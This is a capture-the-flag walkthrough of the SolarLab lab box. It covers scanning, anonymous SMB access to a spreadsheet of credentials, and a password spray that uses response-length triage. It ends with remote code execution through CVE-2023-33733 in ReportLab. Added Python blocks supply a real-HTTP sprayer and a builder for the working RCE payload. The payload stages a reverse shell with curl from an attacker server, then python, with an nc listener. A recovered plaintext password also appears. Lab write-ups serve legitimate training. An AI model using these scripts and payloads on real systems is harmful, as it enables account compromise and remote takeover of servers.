Let's begin with nmap:
nmap -sC -sV -Pn 10.10.11.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-19 11:30 EDT
Nmap scan report for 10.10.11.16
Host is up (0.15s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://solarlab.htb/
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-10-19T15:31:34
|_ start_date: N/A
There is an HTTP port open, so let's check the website first. The http-title shows a redirect to solarlab.htb, so add it to /etc/hosts:
echo "10.10.11.16 solarlab.htb" | sudo tee -a /etc/hosts
I found the 'get in touch' feature where we can type in input; in Burp Suite we can see it being sent to the backend,
but I don't see it being reflected back anywhere, meaning we could only do blind injection. Let's see if there is something easier.
Next, my second nmap scan finished and we got some surprising results!
It's the first time in a while that a CTF validated my use of -p- in nmap.
I think it's great to have habits that check the target fully, but since waiting for the full scan is painful I recommend launching your normal nmap first and letting the full one run in the background.
(You can use -T5 if you want faster results, but if your connection isn't great the results might not be reliable.)
nmap -Pn -T4 -p- --min-rate=500 10.10.11.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-19 12:59 EDT
Nmap scan report for solarlab.htb (10.10.11.16)
Host is up (1.0s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
6791/tcp open hnm
Nmap done: 1 IP address (1 host up) scanned in 251.88 seconds
Now we can check port 6791 for more info (yes, I know I could have done it in the first run, but I was interested in excluding the normal ports we already checked, and it didn't take much time):
nmap -sC -sV -Pn -p 6791 10.10.11.16
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-19 13:05 EDT
Nmap scan report for solarlab.htb (10.10.11.16)
Host is up (0.11s latency).
PORT STATE SERVICE VERSION
6791/tcp open http nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: Did not follow redirect to http://report.solarlab.htb:6791/
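The quick-scan-then-full-scan workflow described above, scripted: parse the grepable (-oG) output of both scans, take the ports the quick scan missed, and run -sC -sV only on those. This is an added example, not code from the original write-up; the two -oG samples are constructed to mirror the scan results shown on this page, and run_workflow() only works when nmap is on PATH and the target is reachable.

```python
"""Two-phase port scanning: quick default scan first, the full -p- scan in the
background, then -sC -sV restricted to the ports the quick scan missed.
Added example; the -oG samples are constructed, not captured output."""
import re
import shutil
import subprocess
from typing import Iterable, List

# Constructed nmap -oG (grepable) output: quick default-port scan.
QUICK_GNMAP = (
    "# Nmap 7.94SVN scan initiated (constructed sample)\n"
    "Host: 10.10.11.16 ()\tStatus: Up\n"
    "Host: 10.10.11.16 ()\tPorts: 80/open/tcp//http//nginx 1.24.0/, "
    "135/open/tcp//msrpc//Microsoft Windows RPC/, 139/open/tcp//netbios-ssn///, "
    "445/open/tcp//microsoft-ds///\tIgnored State: filtered (996)\n"
)
# Constructed nmap -oG output: full -p- scan, which additionally finds 6791.
FULL_GNMAP = (
    "Host: 10.10.11.16 ()\tStatus: Up\n"
    "Host: 10.10.11.16 ()\tPorts: 80/open/tcp//http///, 135/open/tcp//msrpc///, "
    "139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///, "
    "6791/open/tcp//hnm///\tIgnored State: filtered (65530)\n"
)

# Each entry in the Ports: field looks like <port>/<state>/<proto>//<service>//<version>/
OPEN_TCP = re.compile(r"(?:^|,\s*)(\d+)/open/tcp")


def open_tcp_ports(gnmap: str) -> List[int]:
    """Sorted open TCP ports from nmap -oG output (filtered/closed ports are skipped)."""
    ports = set()
    for line in gnmap.splitlines():
        if "\tPorts: " not in line:
            continue
        # Fields are tab-separated; keep only the Ports: field so text in other
        # fields can never be mistaken for a port entry.
        ports_field = line.split("\tPorts: ", 1)[1].split("\t", 1)[0]
        ports.update(int(p) for p in OPEN_TCP.findall(ports_field))
    return sorted(ports)


def new_ports(quick_gnmap: str, full_gnmap: str) -> List[int]:
    """Ports the full scan found that the quick scan did not report."""
    already_seen = set(open_tcp_ports(quick_gnmap))
    return [p for p in open_tcp_ports(full_gnmap) if p not in already_seen]


def service_scan_argv(target: str, ports: Iterable[int]) -> List[str]:
    """argv for the follow-up -sC -sV scan restricted to `ports`; [] if nothing new."""
    port_list = ",".join(str(p) for p in ports)
    if not port_list:
        return []
    return ["nmap", "-sC", "-sV", "-Pn", "-p", port_list, target]


def run_workflow(target: str) -> List[str]:
    """Run the three scans for real (needs nmap on PATH and a reachable target).
    Returns the argv of the follow-up scan, or [] if the full scan found nothing
    new. In practice start the -p- scan in a second terminal while you explore
    the quick-scan results, exactly as the write-up suggests."""
    if shutil.which("nmap") is None:
        raise RuntimeError("nmap not found on PATH")

    def scan(*args: str) -> str:
        # "-oG -" writes grepable output to stdout
        return subprocess.run(
            ["nmap", *args, "-oG", "-", target],
            capture_output=True, text=True, check=True,
        ).stdout

    quick = scan("-sC", "-sV", "-Pn")
    full = scan("-Pn", "-T4", "-p-", "--min-rate=500")
    argv = service_scan_argv(target, new_ports(quick, full))
    if argv:
        subprocess.run(argv, check=True)
    return argv


if __name__ == "__main__":
    delta = new_ports(QUICK_GNMAP, FULL_GNMAP)
    print("new ports:", delta)  # [6791]
    print(" ".join(service_scan_argv("10.10.11.16", delta)))
```

Run as-is it works on the constructed samples; call run_workflow("10.10.11.16") to drive real scans.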
I added report.solarlab.htb to /etc/hosts:
echo "10.10.11.16 report.solarlab.htb" | sudo tee -a /etc/hosts
Now go to http://report.solarlab.htb:6791/
It's asking for credentials; before attempting brute force I looked for more info.
So let's check SMB:
┌──(kali㉿kali)-[~]
└─$ smbclient -N -L //10.10.11.16
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Documents Disk
IPC$ IPC Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.16 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(kali㉿kali)-[~]
└─$ smbclient -N //10.10.11.16/Documents
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Fri Apr 26 10:47:14 2024
.. DR 0 Fri Apr 26 10:47:14 2024
concepts D 0 Fri Apr 26 10:41:57 2024
desktop.ini AHS 278 Fri Nov 17 05:54:43 2023
details-file.xlsx A 12793 Fri Nov 17 07:27:21 2023
My Music DHSrn 0 Thu Nov 16 14:36:51 2023
My Pictures DHSrn 0 Thu Nov 16 14:36:51 2023
My Videos DHSrn 0 Thu Nov 16 14:36:51 2023
old_leave_request_form.docx A 37194 Fri Nov 17 05:35:57 2023
7779839 blocks of size 4096. 1893625 blocks available
Let's search for interesting files and download them using get.
I found passwords in details-file.xlsx.
It looks like the questions don't have the right answers,
so I am assuming the other info might be scrambled too. Let's check each username with each password.
By the length of the response we can see there are two different responses, 2419 and 2408:
"User not found" and "User authentication error".
In the file we found it looked like there might be three users.
Because we get "User authentication error" for ClaudiaS and AlexanderK, we can assume we found the right usernames for two of the users, and we have checked all the passwords we have.
So next I tried to guess the third username, for blake.byte. It looks like every username is made from the first name and the first letter of the last name (Alexander.knight@gmail.com: Knight is probably the last name -> AlexanderK).
Now I tried BlakeB with every password available.
Found it
BlakeB:ThisCanB3typedeasily1@
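The spray above, automated: derive usernames with the FirstnameL convention, try every username/password pair, and sort the results by response length, since the two failure pages differ in size. This is an added example, not code from the original write-up. Assumptions: the login is a POST to /login with form fields 'username' and 'password' (the page does not show the field names), the failure pages are 2419 bytes ("User not found") and 2408 bytes ("User authentication error") as observed above, and the password list is constructed apart from the one recovered on the page; simulated_send() stands in for the server so the script runs offline.

```python
"""Credential spray with response-length triage. Added example, not from the
original write-up; endpoint, field names, and all but one password are assumed."""
import re
from typing import Callable, Dict, List, Tuple
from urllib.error import HTTPError
from urllib.parse import urlencode
from urllib.request import Request, urlopen

LOGIN_URL = "http://report.solarlab.htb:6791/login"  # assumed endpoint
LEN_USER_NOT_FOUND = 2419  # observed body length for "User not found"
LEN_BAD_PASSWORD = 2408    # observed body length for "User authentication error"


def username_from_name(name: str) -> str:
    """FirstnameL convention inferred from the spreadsheet:
    'Alexander.knight@gmail.com' -> 'AlexanderK', 'blake byte' -> 'BlakeB'."""
    local_part = name.split("@", 1)[0]
    parts = [p for p in re.split(r"[.\s_-]+", local_part.strip()) if p]
    if len(parts) < 2:
        raise ValueError(f"need a first and last name, got {name!r}")
    return parts[0].capitalize() + parts[-1][0].upper()


def classify(body_len: int) -> str:
    """Map a response length to what the app told us; anything else deserves a look."""
    if body_len == LEN_USER_NOT_FOUND:
        return "user-not-found"
    if body_len == LEN_BAD_PASSWORD:
        return "bad-password"
    return "anomaly"


def http_send(user: str, password: str, url: str = LOGIN_URL) -> int:
    """Real sender: POST the form and return the body length. urlopen follows
    redirects, so a successful login lands on a different page either way."""
    data = urlencode({"username": user, "password": password}).encode()
    try:
        with urlopen(Request(url, data=data, method="POST"), timeout=10) as resp:
            return len(resp.read())
    except HTTPError as err:  # 4xx/5xx bodies are still informative
        return len(err.read())


def spray(users: List[str], passwords: List[str],
          send: Callable[[str, str], int]) -> Dict[str, list]:
    """Try every pair. A user that only ever yields 'user-not-found' is reported
    as invalid so you stop burning attempts on it; any unexpected length is a hit."""
    valid_users: List[str] = []
    invalid_users: List[str] = []
    hits: List[Tuple[str, str]] = []
    for user in users:
        outcomes = set()
        for password in passwords:
            outcome = classify(send(user, password))
            outcomes.add(outcome)
            if outcome == "anomaly":
                hits.append((user, password))
        (invalid_users if outcomes == {"user-not-found"} else valid_users).append(user)
    return {"valid_users": valid_users, "invalid_users": invalid_users, "hits": hits}


# Constructed stand-in for the server so the example runs offline. Only the
# password recovered on the page is real; the other two are made up.
PASSWORDS = ["Winter2023!", "ThisCanB3typedeasily1@", "P@ssw0rd123"]


def simulated_send(user: str, password: str) -> int:
    if user == "BlakeB" and password == "ThisCanB3typedeasily1@":
        return 3120  # a third length: the post-login page
    if user in ("ClaudiaS", "AlexanderK", "BlakeB"):
        return LEN_BAD_PASSWORD
    return LEN_USER_NOT_FOUND


if __name__ == "__main__":
    candidates = ["ClaudiaS", "AlexanderK", "blake.byte", username_from_name("blake.byte")]
    print(spray(candidates, PASSWORDS, simulated_send))
    # swap simulated_send for http_send to run against the real target
```

Swap simulated_send for http_send to run it for real; the classification thresholds are what make this work, so re-check the two lengths in Burp first if the page has changed.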
Let's try sending a request.
I got a PDF; before playing with the inputs more, let's inspect the PDF.
I found this vulnerability:
https://github.com/c53elyas/CVE-2023-33733 (a remote code execution bug in the ReportLab PDF library, triggered through a color attribute in its paragraph markup)
Let's try it, but remove the 'touch' command from the PoC because the target is Windows:
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
meow
</font></para>
Even when Burp Suite was used, with no interaction with the front end, the back end still complained that I had reached the character limit, so I tried shortening the variable names and deleting unnecessary spaces:
<font color="[[getattr(pow,W('__globals__'))['os'].system('')for W in[O('W',
(str,),{'M':1,'startswith':lambda
s,x:False, '__eq__':lambda s,x:s.m()and s.M<0 and str(s)==x,'m':lambda s:
{setattr(s,'M',s.M-1)},'__hash__':lambda s:hash(str(s))})]]for O in
[type(type(1))]]and 'red'">meow</font>
We got "meow" in red, meaning it worked.
Now use the system() part of the PoC; I probably could have just started by testing that.
Because of the character limit we can't just put the whole reverse shell in system(), so I uploaded a file with a reverse shell and then ran it, as two different HTTP requests.
You can write or find a reverse shell; I used one in Python. Let's call it 'p' so the commands are as short as possible.
In the same directory as the file, I started an HTTP server:
sudo python3 -m http.server 80
Now I send a POST request with system('curl -o p YOUR_IP/p') in the PoC.
It looks like the server crashed, but the request still went through, yay!
Now open a listener (nc -lvnp 4444)
and do the second step: run it with system('python p').
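The two-stage delivery above, as a payload builder: it drops an arbitrary command into the shortened gadget and checks the two things that bit the author. First, the markup has to fit the form's character limit. Second, the expression sits inside a double-quoted color="..." attribute and a single-quoted Python string literal, so the command may contain neither kind of quote, and '<' or '&' would be eaten by the markup parser (which also rules out chaining with &&). This is an added example, not code from the original post or the PoC repository; the gadget is the write-up's trimmed version joined onto one line, and the character limit and attacker address are assumptions.

```python
"""Payload builder for the trimmed CVE-2023-33733 gadget used above.
Added example; LIMIT and the attacker address are assumptions."""
from typing import List

# The trimmed gadget from the write-up, with @CMD@ where system('') was empty.
GADGET = (
    "<font color=\"[[getattr(pow,W('__globals__'))['os'].system('@CMD@')"
    "for W in[O('W',(str,),{'M':1,'startswith':lambda s,x:False,"
    "'__eq__':lambda s,x:s.m()and s.M<0 and str(s)==x,"
    "'m':lambda s:{setattr(s,'M',s.M-1)},'__hash__':lambda s:hash(str(s))})]]"
    "for O in[type(type(1))]]and 'red'\">meow</font>"
)

# '"' ends the attribute, "'" ends the Python string literal, '<' starts a tag,
# and '&' starts an entity in the paragraph markup: none can appear in cmd.
FORBIDDEN = set("\"'<&")


def command_is_safe(cmd: str) -> bool:
    """True if cmd can be placed inside system('...') in the attribute unchanged."""
    return not (FORBIDDEN & set(cmd))


def build_payload(cmd: str) -> str:
    """Gadget with cmd substituted; refuses commands that would break the markup."""
    if not command_is_safe(cmd):
        raise ValueError(f"command contains one of {''.join(sorted(FORBIDDEN))}: {cmd!r}")
    return GADGET.replace("@CMD@", cmd)


def fits(payload: str, limit: int) -> bool:
    """Check the field's character limit before sending."""
    return len(payload) <= limit


def staged_payloads(attacker: str, name: str = "p") -> List[str]:
    """Two separate requests, as done above: fetch the reverse shell, then run it.
    `attacker` is host[:port] of the python3 -m http.server that serves `name`."""
    return [
        build_payload(f"curl -o {name} {attacker}/{name}"),
        build_payload(f"python {name}"),
    ]


if __name__ == "__main__":
    LIMIT = 500  # assumed form limit; set it to whatever the app enforces
    for p in staged_payloads("10.10.14.5"):  # example attacker IP
        print(len(p), "ok" if fits(p, LIMIT) else "TOO LONG")
        print(p)
```

Paste each printed payload into the PDF request body in Burp one at a time; the first stage needs the HTTP server up, the second needs the listener up.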
After getting the connection, the flag is in C:/Users/blake/Desktop/user.txt.
Good luck!